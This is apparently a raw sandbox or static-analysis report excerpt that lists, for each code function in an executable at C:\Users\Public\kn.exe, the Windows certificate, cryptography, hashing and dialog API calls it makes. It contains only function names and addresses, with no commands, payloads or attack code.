Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085E274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF7E085E274
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0806280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E0806280
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0852278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,	6_2_00007FF7E0852278
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07BE3B0 #357,#357,CryptDecodeObject,LocalFree,	6_2_00007FF7E07BE3B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07D23E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,	6_2_00007FF7E07D23E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07B4410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E07B4410
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0868404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,	6_2_00007FF7E0868404
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0826374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,	6_2_00007FF7E0826374
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0822358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,	6_2_00007FF7E0822358
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08024D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,	6_2_00007FF7E08024D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07A44E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E07A44E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085E516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF7E085E516
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07BC514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,	6_2_00007FF7E07BC514
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E080A450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,	6_2_00007FF7E080A450
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E080C450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,	6_2_00007FF7E080C450
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0828488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E0828488
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08365B4 NCryptIsKeyHandle,_CxxThrowException,	6_2_00007FF7E08365B4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07BC5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,	6_2_00007FF7E07BC5D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,	6_2_00007FF7E07F25E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07B8600 #357,CryptDecodeObject,GetLastError,LocalFree,	6_2_00007FF7E07B8600
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E089A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,	6_2_00007FF7E089A58C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E086A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,	6_2_00007FF7E086A590
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E082E57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,	6_2_00007FF7E082E57C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07D26E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,	6_2_00007FF7E07D26E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08666D8 NCryptFreeObject,#360,	6_2_00007FF7E08666D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08586D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,	6_2_00007FF7E08586D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C0630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E07C0630
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0866654 NCryptGetProperty,#360,	6_2_00007FF7E0866654
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07FA654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,	6_2_00007FF7E07FA654
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0804694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,	6_2_00007FF7E0804694
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C6694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,	6_2_00007FF7E07C6694
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08307A4 BCryptDestroyHash,#205,#357,	6_2_00007FF7E08307A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08407D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF7E08407D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08227BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E08227BC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07967CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E07967CC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081C7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,	6_2_00007FF7E081C7F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08307F4 BCryptDestroyKey,#205,#357,	6_2_00007FF7E08307F4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0868814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,	6_2_00007FF7E0868814
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0822724 CryptDecodeObject,GetLastError,#357,	6_2_00007FF7E0822724
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0830740 BCryptCloseAlgorithmProvider,#205,#357,#357,	6_2_00007FF7E0830740
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E086A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF7E086A740
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E089E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,	6_2_00007FF7E089E8B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07AA8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,	6_2_00007FF7E07AA8CC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08308EC BCryptGetProperty,#205,#359,#357,#357,	6_2_00007FF7E08308EC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0864914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF7E0864914
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081E914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,	6_2_00007FF7E081E914
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07B6824 CryptHashCertificate,GetLastError,#357,	6_2_00007FF7E07B6824
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0830844 BCryptExportKey,#205,#359,#357,#357,	6_2_00007FF7E0830844
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,	6_2_00007FF7E07F29A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E083099C BCryptOpenAlgorithmProvider,#205,#359,#359,	6_2_00007FF7E083099C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E086A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF7E086A9F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07FE9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,	6_2_00007FF7E07FE9F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081AA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,	6_2_00007FF7E081AA00
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0838940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,	6_2_00007FF7E0838940
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E083C940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,	6_2_00007FF7E083C940
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07BC960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,	6_2_00007FF7E07BC960
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0862994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,	6_2_00007FF7E0862994
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0838AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF7E0838AA0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0830ABC BCryptVerifySignature,#205,#357,#357,#357,#357,	6_2_00007FF7E0830ABC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0832AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,	6_2_00007FF7E0832AE4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07D2B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,	6_2_00007FF7E07D2B00
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0828AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,	6_2_00007FF7E0828AFC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0814A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,	6_2_00007FF7E0814A34
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0830A18 BCryptSetProperty,#205,#359,#357,#357,	6_2_00007FF7E0830A18
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0834A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,	6_2_00007FF7E0834A1C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07A6A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,	6_2_00007FF7E07A6A84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0862A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,	6_2_00007FF7E0862A78
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,	6_2_00007FF7E081EA7C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085CBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,	6_2_00007FF7E085CBB4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07BCB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,	6_2_00007FF7E07BCB98
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0860B9C CryptHashData,GetLastError,#357,	6_2_00007FF7E0860B9C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0832BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF7E0832BC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0860BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,	6_2_00007FF7E0860BF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E089EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,	6_2_00007FF7E089EB38
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0830B80 NCryptCreatePersistedKey,#205,#359,#359,#357,	6_2_00007FF7E0830B80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E083ACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,	6_2_00007FF7E083ACAC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0824CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF7E0824CA0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F4CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,	6_2_00007FF7E07F4CC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0888CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,	6_2_00007FF7E0888CF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0866CE0 NCryptEnumStorageProviders,#360,	6_2_00007FF7E0866CE0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0830D14 NCryptFinalizeKey,#205,#357,#357,	6_2_00007FF7E0830D14
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0822CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,	6_2_00007FF7E0822CF8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0832CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,	6_2_00007FF7E0832CFC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07CCC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,	6_2_00007FF7E07CCC24
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0866C30 NCryptOpenStorageProvider,#360,	6_2_00007FF7E0866C30
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0830C3C NCryptExportKey,#205,#359,#359,#357,	6_2_00007FF7E0830C3C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0796C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,	6_2_00007FF7E0796C4C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0868C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,	6_2_00007FF7E0868C58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0866C88 NCryptEnumAlgorithms,#360,	6_2_00007FF7E0866C88
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0832C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,	6_2_00007FF7E0832C80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0874C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,	6_2_00007FF7E0874C80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0862DAC #357,#357,CryptFindOIDInfo,LocalFree,	6_2_00007FF7E0862DAC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0858DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,	6_2_00007FF7E0858DD0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0830DD4 NCryptGetProperty,#205,#359,#357,#359,#357,	6_2_00007FF7E0830DD4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0880DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,	6_2_00007FF7E0880DB8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0814DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,	6_2_00007FF7E0814DDC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0866DE0 NCryptCreatePersistedKey,#360,	6_2_00007FF7E0866DE0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0866D2C NCryptFreeBuffer,#360,	6_2_00007FF7E0866D2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F2D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF7E07F2D18
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0832D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,	6_2_00007FF7E0832D78
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0866D78 NCryptOpenKey,#360,	6_2_00007FF7E0866D78
